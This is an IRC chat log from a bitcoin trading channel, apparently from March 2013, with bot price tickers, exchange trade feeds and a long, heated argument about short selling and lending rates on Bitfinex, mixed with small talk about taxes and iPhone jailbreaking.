srs Mar 29 01:41:48 $unconfirmed Mar 29 01:41:52 smickles: 1333 Mar 29 01:41:53 srs Mar 29 01:42:23 Yeah, my fees are based on what Armory suggests Mar 29 01:42:29 $sandwich Mar 29 01:42:35 Sometimes it's 0.0001, sometimes it's 0.0005 Mar 29 01:43:14 so armory seems to account for that? Mar 29 01:43:15 i just made it .001 and forgot about it Mar 29 01:44:00 I think it's mostly based on amount of inputs... but yeah, kind of Mar 29 01:44:23 so its 29th Mar 29 01:44:32 isnt it ian bakewell's moment of truth Mar 29 01:44:58 yeah... Mar 29 01:45:01 poor ian Mar 29 01:45:21 He shorted at what price? Mar 29 01:45:31 34.5 Mar 29 01:45:33 35 Mar 29 01:45:34 lol Mar 29 01:45:36 Damn... Mar 29 01:46:01 So like 30k USD loss if he pays back Mar 29 01:46:10 look at this buying power Mar 29 01:46:11 amazing Mar 29 01:48:13 ;;ticker Mar 29 01:48:14 BTCUSD ticker | Best bid: 87.99999, Best ask: 88.00000, Bid-ask spread: 0.00001, Last trade: 88.00000, 24 hour volume: 136246.06886715, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.41623 Mar 29 01:48:28 ;;asks 92 Mar 29 01:48:30 There are currently 2084.7938 bitcoins offered at or under 92.0 USD, worth 188350.163298 USD in total. | Data vintage: 0.0017 seconds Mar 29 01:48:37 ;;asks 95 Mar 29 01:48:37 There are currently 8026.3054 bitcoins offered at or under 95.0 USD, worth 746419.333104 USD in total. | Data vintage: 7.7048 seconds Mar 29 01:50:16 http://www.usnews.com/news/articles/2013/03/26/minor-league-baseball-team-to-debut-urinal-video-games Mar 29 01:50:19 ;;goxlag Mar 29 01:50:20 0.328974 seconds Mar 29 01:50:31 ;;ticker Mar 29 01:50:32 BTCUSD ticker | Best bid: 87.50002, Best ask: 87.78000, Bid-ask spread: 0.27998, Last trade: 87.50001, 24 hour volume: 138377.72130273, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.42466 Mar 29 01:51:02 ;;asks 200 Mar 29 01:51:05 There are currently 45195.463 bitcoins offered at or under 200.0 USD, worth 5025968.47558 USD in total. | Data vintage: 0.0038 seconds Mar 29 01:51:37 You're funny mp; Mar 29 01:53:00 [MPEX] [S.MPOE] 14455 @ 0.0006357 = 9.189 BTC [-] Mar 29 01:53:25 quite the crash this afternoon, eh gentlemen? Mar 29 01:53:40 Mar 29 01:54:29 retrace to seventy five and then flat back one day? two? Mar 29 01:54:44 i should start keeping fiat on gox for these events Mar 29 01:54:57 [MPEX] [O.BTCUSD.C750T] 308 @ 0.15862914 = 48.8578 BTC [-] Mar 29 01:59:07 [HAVELOCK] [SDICE] 1 @ 0.38 BTC [-] Mar 29 01:59:09 [HAVELOCK] [SDICE] 3 @ 0.37000001 = 1.11 BTC [-] Mar 29 01:59:10 [HAVELOCK] [SDICE] 4 @ 0.37 = 1.48 BTC [-] Mar 29 01:59:11 [HAVELOCK] [SDICE] 2 @ 0.35500001 = 0.71 BTC [-] Mar 29 02:03:30 $unconfirmed Mar 29 02:03:34 smickles: 1164 Mar 29 02:07:47 sup everyone Mar 29 02:07:52 fun ride huh? Mar 29 02:07:58 fucking gox Mar 29 02:10:03 heh, bitcoin is good for that every once in a while, gox just makes it worse Mar 29 02:10:25 we might have a stable currency except for gox Mar 29 02:10:54 when gox is down bitcoin is stable Mar 29 02:10:58 didnt ya know Mar 29 02:12:18 heh yea fun Mar 29 02:16:29 so silly Mar 29 02:16:38 what was the low? Mar 29 02:16:40 77? Mar 29 02:17:06 also...i don't think that the charts are keeping up Mar 29 02:18:20 ;;ticker Mar 29 02:18:22 BTCUSD ticker | Best bid: 84.63439, Best ask: 84.80000, Bid-ask spread: 0.16561, Last trade: 84.80000, 24 hour volume: 144582.26393633, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.34194 Mar 29 02:22:42 ;;ticker Mar 29 02:22:43 BTCUSD ticker | Best bid: 85.20000, Best ask: 85.39000, Bid-ask spread: 0.19000, Last trade: 84.99989, 24 hour volume: 146197.46407703, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.31167 Mar 29 02:23:28 ;;ask 100 Mar 29 02:23:29 Error: "ask" is not a valid command. Mar 29 02:32:54 ;;asks 100 Mar 29 02:32:56 There are currently 27577.248 bitcoins offered at or under 100.0 USD, worth 2628721.38478 USD in total. | Data vintage: 0.0246 seconds Mar 29 02:49:17 [BTCTC] [S.DICE-PT] 15 @ 0.00485 = 0.0728 BTC [-] Mar 29 02:49:32 [BTCTC] [ASICMINER-PT] 1 @ 0.87 BTC [-] Mar 29 02:49:43 mpex has pages? :P *nudges Mircea* Mar 29 02:50:09 btw smickles: BF has topped 2,300 BTC 24hr vol :) Mar 29 02:50:45 [BTCTC] [ASICMINER-PT] 20 @ 0.877895 = 17.5579 BTC [+] Mar 29 02:51:14 !ticker m s.mpoe Mar 29 02:51:15 [MPEX:S.MPOE] 1D: 0.0006 / 0.00062205 / 0.00066676 (168732 shares, 104.96 BTC), 7D: 0.0006 / 0.00066192 / 0.00072101 (1713863 shares, 1,134.45 BTC), 30D: 0.0006 / 0.00073488 / 0.00078628 (16836028 shares, 12,372.51 BTC) Mar 29 02:51:58 good Mar 29 02:52:44 stamp is lame too Mar 29 02:52:55 ;;ticker Mar 29 02:52:55 BTCUSD ticker | Best bid: 86.50000, Best ask: 86.87137, Bid-ask spread: 0.37137, Last trade: 86.87137, 24 hour volume: 153284.13060894, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.23528 Mar 29 02:53:05 dunno Mar 29 02:53:55 many reasons, dont have the time to get into that again Mar 29 02:54:18 List of commands: Mar 29 02:55:08 in short, they are slow, the steal via fees since ever, tiny amouts but still and is run by kids with css skills, also trading interface is fcuked, you need 3 or 4 tabs - have fun Mar 29 02:55:20 [MPEX] [S.MPOE] 4700 @ 0.00066676 = 3.1338 BTC [+] Mar 29 02:55:22 [MPEX] [S.MPOE] 5000 @ 0.00067292 = 3.3646 BTC [+] Mar 29 02:55:52 [MPEX] [S.MPOE] 1250 @ 0.00067438 = 0.843 BTC [+] Mar 29 02:57:23 Who are you are talking about? Mar 29 02:58:13 ;;buy 100 Mar 29 02:58:14 (buy [--long] [at|@] []) -- Logs a buy order for units of , at a price of per unit, in units of . Use the optional field to put in any special notes. may include an arithmetical expression, and {mtgox(ask|bid|last)} to index price to mtgox ask, bid, or last price. May also include (1 more message) Mar 29 03:00:08 ;;24hprc Mar 29 03:00:09 Error: "24hprc" is not a valid command. Mar 29 03:00:16 ;;24h,prc Mar 29 03:00:16 Error: "24h,prc" is not a valid command. Mar 29 03:00:27 ;;24hrpc Mar 29 03:00:28 Error: "24hrpc" is not a valid command. Mar 29 03:00:29 OMG Mar 29 03:00:31 [BTCTC] [ASICMINER-PT] 1 @ 0.84 BTC [-] Mar 29 03:02:14 [BTCTC] [ASICMINER-PT] 10 @ 0.87968 = 8.7968 BTC [+] Mar 29 03:05:03 ;; Mar 29 03:05:18 ;;ticker Mar 29 03:05:19 BTCUSD ticker | Best bid: 87.73000, Best ask: 87.75000, Bid-ask spread: 0.02000, Last trade: 87.73000, 24 hour volume: 155699.24992401, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.21684 Mar 29 03:09:48 ;;help Mar 29 03:09:48 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Mar 29 03:10:28 !facts Mar 29 03:12:36 ;;asks 100 Mar 29 03:12:41 There are currently 24555.229 bitcoins offered at or under 100.0 USD, worth 2358207.51086 USD in total. | Data vintage: 0.0027 seconds Mar 29 03:13:16 ;;asks 99.9 Mar 29 03:13:17 There are currently 21738.811 bitcoins offered at or under 99.9 USD, worth 2076585.24429 USD in total. | Data vintage: 35.6864 seconds Mar 29 03:14:52 ;;ticker Mar 29 03:14:53 BTCUSD ticker | Best bid: 90.00000, Best ask: 90.04900, Bid-ask spread: 0.04900, Last trade: 90.00000, 24 hour volume: 155899.94157540, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.21739 Mar 29 03:26:03 well...say goodbye to another bunch of weak hands i guess Mar 29 03:28:33 ;;goxlag Mar 29 03:28:34 18.994122 seconds Mar 29 03:33:21 gratz Ukto :) Mar 29 03:41:53 the growth wouldn't be as extreme Mar 29 03:41:56 and it's not as if it's "disabled" Mar 29 03:42:01 it's just that it isn't very prevalent Mar 29 03:42:16 [BTCTC] [ASICMINER-PT] 1 @ 0.87 BTC [-] Mar 29 03:44:24 yes...you can short right now Mar 29 03:44:28 it is relatively easy Mar 29 03:45:00 fucking bullshit though...minutes of lag Mar 29 03:45:12 why don't we just mail our orders to gox Mar 29 03:47:04 also...bitfloor has not had these issues...they didn't have a huge dropoff and they have maintained the price...mt gox injects a ton of uncertainty into the market with their horrible matching engine Mar 29 03:47:11 go to bitfinex Mar 29 03:47:25 all you need is to borrow bitcoins Mar 29 03:47:29 and then you sell them Mar 29 03:47:35 you short by finding someone to lend you coins Mar 29 03:47:36 um...since they connect to gox Mar 29 03:47:41 it's not like shares that are much harder to borrow Mar 29 03:47:51 bitfinex connects to gox Mar 29 03:48:07 well...you have access to the liquidity Mar 29 03:48:17 [MPEX] [S.MPOE] 15909 @ 0.00066793 = 10.6261 BTC [-] Mar 29 03:48:19 [MPEX] [S.MPOE] 1344 @ 0.00067438 = 0.9064 BTC [+] Mar 29 03:48:20 APY Mar 29 03:48:25 12% annually Mar 29 03:48:31 were you going to short for a year? Mar 29 03:48:38 [BTCTC] [ASICMINER-PT] 4 @ 0.84 = 3.36 BTC [-] Mar 29 03:48:42 hint: if you are shorting, you expect price to go down Mar 29 03:49:06 yeah...you are totally right tiberiusiv i can't make money selling at 97 and covering at 80 Mar 29 03:49:20 how do you figure? Mar 29 03:49:25 12% is 12% Mar 29 03:49:42 oh...but if THEY RISE IN VALUE YOU ARE A dumbass to short Mar 29 03:49:47 get it? Mar 29 03:49:54 if I think they go up i get long Mar 29 03:50:01 if i think they go down, i short Mar 29 03:50:09 meaning you are paying LOWER rates of interest if you are right Mar 29 03:50:18 and i just showed it to you Mar 29 03:50:26 no Mar 29 03:50:31 how do you figure? Mar 29 03:50:45 let me walk you through the scenario Mar 29 03:50:53 ;;calc 12/365 Mar 29 03:50:53 0.0328767123288 Mar 29 03:50:59 tiberiusiv: it's not currently deflationary Mar 29 03:51:03 .03% Mar 29 03:51:05 in the long run it is Mar 29 03:51:11 so i borrow 100 btc Mar 29 03:51:22 lol Mar 29 03:51:23 i sell at 92 Mar 29 03:51:28 omg stocks are deflationary right now Mar 29 03:51:29 i now have 9200 Mar 29 03:51:41 i owe 100 bitcoins Mar 29 03:51:52 it drops to 80 Mar 29 03:51:56 i cover Mar 29 03:52:01 i made 1200 Mar 29 03:52:05 let's examine that Mar 29 03:52:08 100 btc Mar 29 03:52:10 for one day Mar 29 03:52:11 costs Mar 29 03:52:43 ;;calc 100 * .0003 Mar 29 03:52:43 0.03 Mar 29 03:52:46 ah ok Mar 29 03:52:55 it would cost me .03 bitcoins Mar 29 03:52:58 which at 80 Mar 29 03:53:01 would be... Mar 29 03:53:11 ;;calc 80 *.03 Mar 29 03:53:11 2.4 Mar 29 03:53:14 omg Mar 29 03:53:16 $2 Mar 29 03:53:20 looks like S.MPOE bounced Mar 29 03:53:26 i had to spend $2 in order to short Mar 29 03:53:33 how could i ever make that back Mar 29 03:53:38 IF IT GOES UP YOU IDIOT Mar 29 03:53:42 lol Mar 29 03:53:47 this is an awesome conversation to watch Mar 29 03:53:54 like i said Mar 29 03:54:02 you have to pay 2 dollars in interest Mar 29 03:54:08 you made 1200 in my scenario Mar 29 03:54:12 seems reasonable Mar 29 03:54:24 i don't think you understand how apy works Mar 29 03:54:30 you are paying a tiny tiny rate of interest Mar 29 03:54:37 ugh Mar 29 03:54:44 and... Mar 29 03:54:49 so Mar 29 03:54:55 if i expect it to stay where it is Mar 29 03:54:58 i probably wouldn't short Mar 29 03:54:59 duh Mar 29 03:55:10 i don't think you understand how speculation works Mar 29 03:55:20 MJR_III: it takes a speculum, right? Mar 29 03:55:26 copumpkin: hehehe Mar 29 03:55:36 another epic troll by tiberiusiv Mar 29 03:55:45 how is that Mar 29 03:55:48 i managed to pay it Mar 29 03:55:52 seemed possible Mar 29 03:55:57 i shorted, made money Mar 29 03:56:02 then went long and rode it back up Mar 29 03:56:09 you can't pay that back Mar 29 03:56:10 tiberiusiv: how do you expect to short then, when risk for the lender is so high? should lending not exist at all? Mar 29 03:56:30 first off Mar 29 03:56:42 there aren't 21 million bitcoins yet Mar 29 03:56:45 tiberiusiv: that's an argument against any interest rate you pick Mar 29 03:56:48 0.01% Mar 29 03:56:50 so you are trying to borrow an impossible amount of money Mar 29 03:56:51 IMPOSSIBLE TO SERVICE Mar 29 03:57:06 lets say i want to borrow 100 quintillion dollars Mar 29 03:57:15 how would i service that debt? Mar 29 03:57:17 in other news, if you borrow all the money in the world, things might go strangely Mar 29 03:57:22 news at 11 Mar 29 03:57:26 hehehe Mar 29 03:57:41 tiberiusiv: but only for principal Mar 29 03:57:46 no money is created for interest Mar 29 03:57:53 P != P+I Mar 29 03:58:08 this is fractional reserve lending 101 Mar 29 03:58:19 you cannot always obtain dollars Mar 29 03:58:27 there is RIGHT NOW Mar 29 03:58:31 a limited number of dollars Mar 29 03:58:33 AND Mar 29 03:58:42 it is lower than the total amount owed Mar 29 03:58:52 tiberiusiv: where did you learn about this stuff, out of curiosity? Mar 29 03:58:52 ok Mar 29 03:59:02 copumpkin: where did he NOT learn about this? Mar 29 03:59:32 ok...but a lot of people don't seem to want to lend their bitcoins Mar 29 03:59:39 AND THE RATE FLOATS Mar 29 03:59:48 that is the markets desire for interest on btc Mar 29 03:59:50 it does Mar 29 04:00:11 wrong Mar 29 04:00:13 its not even 12 Mar 29 04:00:23 its currently at...9.5 Mar 29 04:00:33 tiberiusiv: you'd be surprised :) Mar 29 04:00:34 go to the "lending" page Mar 29 04:00:43 lending rates historically have been way higher in bitcoin Mar 29 04:00:44 look at BTC Lending offers Mar 29 04:00:55 tiberiusiv: and how do you propose that happen, as I asked before? Mar 29 04:01:02 there's still large risk for the lender Mar 29 04:01:23 if you look at the site we are talking about...you will see that bitcoin lending and dollar lending is a market like any other Mar 29 04:01:32 the current VARIABLE rate is 9.5% Mar 29 04:01:47 ok...you said it is 12 and has always been 12 Mar 29 04:01:59 ok...i want to short all the aapl shares in the world Mar 29 04:02:05 there is a concept of hard to borrow Mar 29 04:02:17 i need to "locate" the shares before i can sell short Mar 29 04:02:30 i don't think you understand how the free market works Mar 29 04:02:41 lol Mar 29 04:02:44 you can lend coins for as much as you can get Mar 29 04:02:51 right now...thats 9.5% Mar 29 04:02:52 I HAVE DECREED Mar 29 04:02:57 THEREFORE IT IS SO Mar 29 04:03:02 no one has defaulted on bitfinex Mar 29 04:03:04 I HAVE AN EXPLANATION FOR WHY, SO THAT IS THE EXPLANATION Mar 29 04:03:05 you CAN'T Mar 29 04:03:16 do you understand what a margin call is? Mar 29 04:03:29 first, you can see it yourself Mar 29 04:03:41 2500 btc i would say Mar 29 04:03:49 5 to 1 margin Mar 29 04:03:59 well...no one is taking whats out there Mar 29 04:04:03 so it seems to be more than enough Mar 29 04:04:09 ok... Mar 29 04:04:12 your point being Mar 29 04:04:27 ... Mar 29 04:04:30 well...that is probably because you'd have to be stupid to short Mar 29 04:04:40 you can still approach me and say "hey copumpkin, can I borrow some coins?" Mar 29 04:05:05 you know his holdings? Mar 29 04:05:11 pray tell how did you obtain this info? Mar 29 04:05:27 lol Mar 29 04:05:29 and you know this how? Mar 29 04:05:43 put your money where your mouth is Mar 29 04:05:50 and go to bitfinex and take out the short Mar 29 04:05:57 you can short 2500 RIGHT NOW Mar 29 04:06:04 if you put up 500 or so coins Mar 29 04:06:15 because you'll make money Mar 29 04:06:22 because it'll go down Mar 29 04:06:26 you can lock in fixed rates Mar 29 04:06:38 oh my gosh Mar 29 04:06:45 have you ever even seen bitfinex's site Mar 29 04:06:49 i can lock in 10% Mar 29 04:07:10 but you aren't paying in dollars Mar 29 04:07:15 you are paying in bitcoins Mar 29 04:07:18 no you don't Mar 29 04:07:21 you have to OWN bitcoins Mar 29 04:07:27 ok, enough Mar 29 04:07:36 if the price doubles the INTEREST is the last of your worries Mar 29 04:07:46 you will get stopped out if it goes up by 20% Mar 29 04:07:47 have you heard of daily settlement? Mar 29 04:07:55 I wonder if they do that Mar 29 04:08:05 copumpkin: i'm just gonna mute...its obvious he has no idea what he's talking about Mar 29 04:08:18 ah...peace and quiet Mar 29 04:08:22 we have a baller here Mar 29 04:08:38 lol Mar 29 04:08:50 you can tell yourself that to make yourself feel better about not having any real arguments Mar 29 04:09:02 copumpkin: he has been at this game for a week now Mar 29 04:09:07 just trollling bitcoin-assets Mar 29 04:09:18 i ignored him on my phone's irc client Mar 29 04:09:23 but forgot to do it on MiRc Mar 29 04:09:25 I conveniently own a slice of MPOE! Mar 29 04:09:28 yay! Mar 29 04:09:40 so i got sucked into yet another stupid conversation with an idiot Mar 29 04:09:44 tiberiusiv? Mar 29 04:09:49 yes Mar 29 04:09:51 1000 times earnings? Mar 29 04:10:11 I was one of the first investors Mar 29 04:10:13 I paid nothing for it Mar 29 04:10:17 or close to it Mar 29 04:10:26 no Mar 29 04:10:26 MJR_III not to interupt this retardedness, but what are the requirements to borrow at 12%? IE: How do they know you won't abscond with the coins? Mar 29 04:10:27 copumpkin: are you involved with iphone jailbreaking? Mar 29 04:10:28 I bought them Mar 29 04:10:31 MJR_III: yep Mar 29 04:10:34 well, I was Mar 29 04:10:40 bgupta: you cannot default Mar 29 04:10:46 they hold your account Mar 29 04:10:49 you cannot withdraw from it Mar 29 04:10:52 tiberiusiv: I can't remember now, it was ages ago Mar 29 04:10:54 you can only trade with it Mar 29 04:11:06 if you lose what you have in the bank Mar 29 04:11:07 I think I got a little over 100k shares for 5 or 10 btc? Mar 29 04:11:10 Ah so you have to use it to short in their trading system.. you can't borrow it for other reasons. Mar 29 04:11:12 they liquidate your position Mar 29 04:11:15 yes Mar 29 04:11:16 makes sense Mar 29 04:11:21 got it Mar 29 04:11:23 similar to most prop trading firms Mar 29 04:11:26 its a nice system Mar 29 04:11:35 tiberiusiv: you could get upwards of 10kbtc margin on mpex, iirc. but that's a scam. amirite :D Mar 29 04:11:36 tiberiusiv: it's logged on MP's blog somewhere, if you look far enough back Mar 29 04:11:39 I don't trade currencies so not for me. Mar 29 04:11:46 yeah Mar 29 04:11:50 tiberiusiv: you know that someone who disagrees with you isn't automatically poor or stupid Mar 29 04:11:56 copumpkin: he doesn't know that Mar 29 04:12:00 people can just disagree without it devolving into elementary school playground Mar 29 04:12:15 you've said I'm poor because I disagree with you Mar 29 04:12:17 it's kind of amusing Mar 29 04:12:35 you can maintain that Mar 29 04:12:36 tiber is now on my ignore list. Mar 29 04:12:36 I can disagree Mar 29 04:12:37 the main problem with tiberiusiv is that he doesn't just shut up and short bitcoins, if he is so bearish...then put your money where your mouth is and go short Mar 29 04:12:47 i hope everyone ignores him eventually Mar 29 04:13:02 I mean literally I can't see what he is typing. Mar 29 04:13:06 mostly just because i have no interest in listening to his idiocy, but i still have to see the other half of the convo Mar 29 04:13:14 bgupta: me neither Mar 29 04:13:24 the most annoying thing about /ignore is that people keep talking about how they can't see what someone is typing :P Mar 29 04:13:32 sorry Mar 29 04:13:39 i like ignoring Mar 29 04:13:46 but it makes for strange half convos Mar 29 04:13:53 MJR_III: he's ignored you. Your messages don't get through to him (if you haven't used IRC much before) Mar 29 04:13:58 where you are like "huh? what are you guys talking about" Mar 29 04:13:58 I mean tiberiusiv Mar 29 04:14:23 copumpkin: where you telling tiberiusiv? Mar 29 04:14:35 were* Mar 29 04:14:41 bitfinx is pretty new, that may have to do with their size Mar 29 04:14:55 yeah not huge...but they pass through to gox Mar 29 04:14:58 tiberiusiv: I haven't really seen particular evidence of that, and he's not extrapolating unnecessarily, which are doing Mar 29 04:15:02 which *you are doing Mar 29 04:15:06 gonna check it out is it only btc/fiat plays or do they have other stuff there? Mar 29 04:15:13 only btc/usd Mar 29 04:15:18 i believe Mar 29 04:15:19 tiberiusiv: of him being a child or particularly stupid Mar 29 04:15:23 i prefer to get margin to go long Mar 29 04:15:36 tiberiusiv: do you accept that there might be explanations other than high interest rates for that? Mar 29 04:15:41 MJR_III: URL? Mar 29 04:15:45 high interest, but if you use it for daytrading its manageable Mar 29 04:15:52 bitfinex.com Mar 29 04:16:14 tiberiusiv: or when the borrower is a thief? :) Mar 29 04:16:18 or is that inconceivable Mar 29 04:16:23 you basically have a btc wallet and a dollars wallet Mar 29 04:16:24 no, I don't Mar 29 04:16:35 i mean on bitfinex Mar 29 04:16:45 tiberiusiv: so everyone's good and the evil lenders force them to steal the money? Mar 29 04:16:51 by imposing rates that are too high Mar 29 04:16:57 if you want to buy and sell bitcoins (withdraw etc) you can use the exchange portion...if you want to trade on margin, there is that portion Mar 29 04:17:13 and if you would rather just lend out dollars or bitcoins...you can do that too Mar 29 04:17:18 do I sense a religious undertone to that judgment? Mar 29 04:17:50 hmmm, i don't think any of the loans i've made > 100btc in value have defaulted Mar 29 04:17:55 opinions are like assholes, they say Mar 29 04:17:55 copumpkin: you are making me think of unignoring him...but i have to be like ulysses and ignore the siren song of trolling Mar 29 04:18:00 MJR_III :) Mar 29 04:18:02 what exchage do the trades get settled? Mar 29 04:18:14 tiberiusiv: you seem intent on preaching a lot and listening very little Mar 29 04:18:19 Guessing MtGox? needs to kinda be mtgox to impact the market no? Mar 29 04:18:23 bgupta: you can basically go to gox or bfx Mar 29 04:18:26 tiberiusiv: I'll let you do that without unnecessary distractions of people trying to talk to you Mar 29 04:18:29 yes Mar 29 04:18:37 but, you can also go to bitfinex's own book Mar 29 04:18:42 which is a lot cheaper from a fee perspective Mar 29 04:18:49 bgupta: actually, this recent fun was started by a 700 btc sale on btce Mar 29 04:18:53 .1% vs .4% i believe Mar 29 04:19:17 took 5 min or so for the traders on gox to even start to react Mar 29 04:19:20 checkit Mar 29 04:19:21 tiberiusiv: I know the default rates are high Mar 29 04:19:21 ;;tslb Mar 29 04:19:26 Time since last block: 17 minutes and 0 seconds Mar 29 04:19:27 sure… if you are a an oracle and know which way things will go and aren't trying to influence the market with your trades. Mar 29 04:19:30 $unconfirmed Mar 29 04:19:33 smickles: 1539 Mar 29 04:19:49 well Mar 29 04:19:50 tiberiusiv: I suggest that you approach things a bit more open-mindedly in future though, and don't just write off anyone who disagrees with you as poor, young, stupid, or otherwise unworthy of talking Mar 29 04:20:04 you can watch other markets to see where general sentiment is going Mar 29 04:20:18 who the fuck cares Mar 29 04:20:20 if you could move money instantly, you could arb bitfloor and btc-e all day Mar 29 04:20:50 the good part of selling on bitfloor is that you can get a liquidity rebate Mar 29 04:20:56 MJR_III: if you could move money instantly, there would be very little to arb in the first place Mar 29 04:21:17 copumpkin: i meant if you singular could do that...not you as in everyone Mar 29 04:21:43 tiberiusiv: credit regulations might apply? Mar 29 04:21:46 for example if you had a relationship between those two exchanges...all arb would go away as they both equalize Mar 29 04:21:54 I haven't looked into the regulations surrounding issuing credit for short selling Mar 29 04:22:08 yes, but do you know that they havne't had to deal with that shit? Mar 29 04:22:10 perhaps they don't Mar 29 04:22:12 I really don't know Mar 29 04:22:15 never been a broker :) Mar 29 04:22:17 copumpkin: has he gotten onto the regulatory dead horse now? Mar 29 04:22:21 nah, that's me :) Mar 29 04:22:28 ;;tslb Mar 29 04:22:29 oooh, icbit Mar 29 04:22:34 Time since last block: 1 minute and 59 seconds Mar 29 04:22:38 copumpkin: you didn't answer though, are you the iphone jailbreaker? Mar 29 04:22:41 o/ Mar 29 04:22:44 MJR_III: I used to be, yep Mar 29 04:22:49 wow i am honored Mar 29 04:22:56 i wish cydia would take btc Mar 29 04:23:00 tiberiusiv: how do you know they don't realize this? Mar 29 04:23:04 MJR_III: hah, me too! Mar 29 04:23:11 has anyone asked saurik? Mar 29 04:23:17 I poked him at some point Mar 29 04:23:23 maybe he'll be more amenable to it now Mar 29 04:23:27 hope so Mar 29 04:23:29 it would be nice Mar 29 04:23:37 you made my day though Mar 29 04:23:42 i thought it was you Mar 29 04:23:42 hah Mar 29 04:23:48 tiberiusiv: what do you think of the futures offerd by icbit? Mar 29 04:23:48 I'm not particularly famous :P Mar 29 04:23:53 but wasn't sure, but i've been a big fan of your work for a long time Mar 29 04:24:02 thanks :) Mar 29 04:24:05 well the whole devteam really Mar 29 04:24:09 since sell off to 75, what was that a 50,000 coin market order? Mar 29 04:24:12 haven't done anything related to it in years though, really Mar 29 04:24:18 but i definitely recognize that handle Mar 29 04:24:21 I think last real iphone work I did was 2009/10? Mar 29 04:24:32 i jailbroke the first iphone on 1.0x Mar 29 04:24:43 ;;asks 95 Mar 29 04:24:46 There are currently 9039.4257 bitcoins offered at or under 95.0 USD, worth 849457.810281 USD in total. | Data vintage: 236.5691 seconds Mar 29 04:24:48 never did any dev stuff there Mar 29 04:24:56 omg it's a Chaang-Noi Mar 29 04:25:00 but we still had to worry about "bricking" and manually creating symlinks Mar 29 04:25:04 Chaang-Noi: tell tiberiusiv how much money we lost! Mar 29 04:25:21 Chaang-Noi: the ice melted around your champagne, didn't it? Mar 29 04:25:53 tiberiusiv: see, Chaang-Noi is a goat, and he's epic baller Mar 29 04:26:02 ultra baller goat Mar 29 04:26:02 the kind that climbs trees Mar 29 04:26:06 lol Mar 29 04:26:15 http://2.bp.blogspot.com/-ISrndp6k1ig/UB-bPE1QSVI/AAAAAAAAAFU/gOxPPXa-Fac/s1600/goats-in-trees.jpg Mar 29 04:26:19 how long you been in btcland copumpkin? Mar 29 04:26:19 he's the guy on the upper left Mar 29 04:26:27 MJR_III: couple of years now, on and off Mar 29 04:26:51 yeah i started playing around with it back in 11...trying to do an fpga miner Mar 29 04:27:02 but got distracted and didn't come back till this january Mar 29 04:27:11 i may be poor, but i think i've gone into the next tax bracket Mar 29 04:27:16 lol nice smickles Mar 29 04:27:47 too much short term capital gains Mar 29 04:27:55 [BTCTC] [PAJKA.BOND] 5 @ 0.1076 = 0.538 BTC [+] Mar 29 04:27:58 smickles: omg you entered the 15% rate bracket? Mar 29 04:28:02 congratulations! Mar 29 04:28:05 :D Mar 29 04:28:05 smickles: you in US? will you declare it? Mar 29 04:28:14 I disagreed with tiberiusiv so I'm clearly in the 10% bracket Mar 29 04:28:18 LOL Mar 29 04:28:27 that is how the tax code works Mar 29 04:28:41 our wealth is determined by our level of agreement with tiberiusiv Mar 29 04:28:48 MJR_III: well, i declared some last year, and i've already bought some things with it this yeear, so yeah, i think i'll declare it Mar 29 04:29:01 smickles: this is US taxes right? Mar 29 04:29:05 yes Mar 29 04:29:11 wonder how they will handle it up in canada Mar 29 04:29:23 smickles: O taxmeister, please tell me, what is the point of throwing a $1700-wide hole like this into the tax code? http://snapplr.com/jxx2 Mar 29 04:29:26 just move to yurop already Mar 29 04:29:31 do they have capital gains and such? wonder if cavirtex will report Mar 29 04:29:44 hi copumpkin :) Mar 29 04:29:51 https://bitcointalk.org/index.php?topic=160388.0 Mar 29 04:29:59 bitcoin will reach 100 Mar 29 04:30:03 wooho Mar 29 04:30:25 smickles yeah, a bit sad, what was the vol on that sale? Mar 29 04:30:56 copumpkin: lol, i dunno Mar 29 04:31:06 tiberiusiv: some is capital gains, some is income Mar 29 04:31:25 it really makes a huge difference that those $1700 are taxed not at 33%, not at 39.6%, but at 35% exactly Mar 29 04:32:13 tiberiusiv: (smickles is an accountant) Mar 29 04:32:19 [MPEX] [S.DICE] 3000 @ 0.00389736 = 11.6921 BTC [-] Mar 29 04:32:58 as mitt famously said :) Mar 29 04:33:20 this'll be the first year i have to pay fed. income tax, unless i'm mistaken Mar 29 04:33:40 poor things Mar 29 04:34:00 tiberiusiv: you don't seem like you know what you are talking about when you say majority of Americans don't pay income taxes. Mar 29 04:34:19 Many do not have a choice, it comes out of their paychecks. Mar 29 04:34:22 i think a lot do, but they don't have to Mar 29 04:34:40 Thats right, for overpayments. Mar 29 04:34:50 KRS1: tiberiusiv wouldn't count an interest free, manditory loan as a tax Mar 29 04:35:25 lol Mar 29 04:35:35 that is my least favorite Mar 29 04:35:35 smickles, this im wasting my time aren't I Mar 29 04:35:39 well, payroll tax always applies Mar 29 04:35:46 so even those that don't pay income tax pay payroll tax Mar 29 04:35:55 KRS1: come join on us on the ignoring tiberiusiv side, its really great Mar 29 04:35:55 well, almost always applies Mar 29 04:35:55 <- off to do something productive Mar 29 04:36:00 unless you're really poor Mar 29 04:36:19 smickles: even if you are poor...they still take it out and you have to file to get it back right? Mar 29 04:36:33 oh, ya know, i have like 30k carry-over from my rental property. I'm not going to pay fed. income tax unless i do a lot better Mar 29 04:36:39 hehehe Mar 29 04:36:57 tiberiusiv: yay! Mar 29 04:37:09 the funniest thing, and this is a testament to the average americans intelligence regarding finance, is that people get excited when they get their own money back Mar 29 04:37:13 tiberiusiv: "case in point" is the idiom Mar 29 04:37:35 anyone one know the volume on the sale to 75 off hand? thanks Mar 29 04:37:51 ;;asks 75 Mar 29 04:38:03 There are currently 0 bitcoins offered at or under 75.0 USD, worth 0.0 USD in total. | Data vintage: 0.0019 seconds Mar 29 04:38:09 i mean the one last night, the huge harket sell order Mar 29 04:38:13 market Mar 29 04:38:17 oh Mar 29 04:38:37 Chaang-Noi: it started with a one-off 700 btc on btce Mar 29 04:38:38 i literally don't even know why someone would do that Mar 29 04:38:43 so much slippage Mar 29 04:38:49 ;;bids 75 Mar 29 04:38:49 There are currently 43668.029 bitcoins demanded at or over 75.0 USD, worth 3431186.42875 USD in total. | Data vintage: 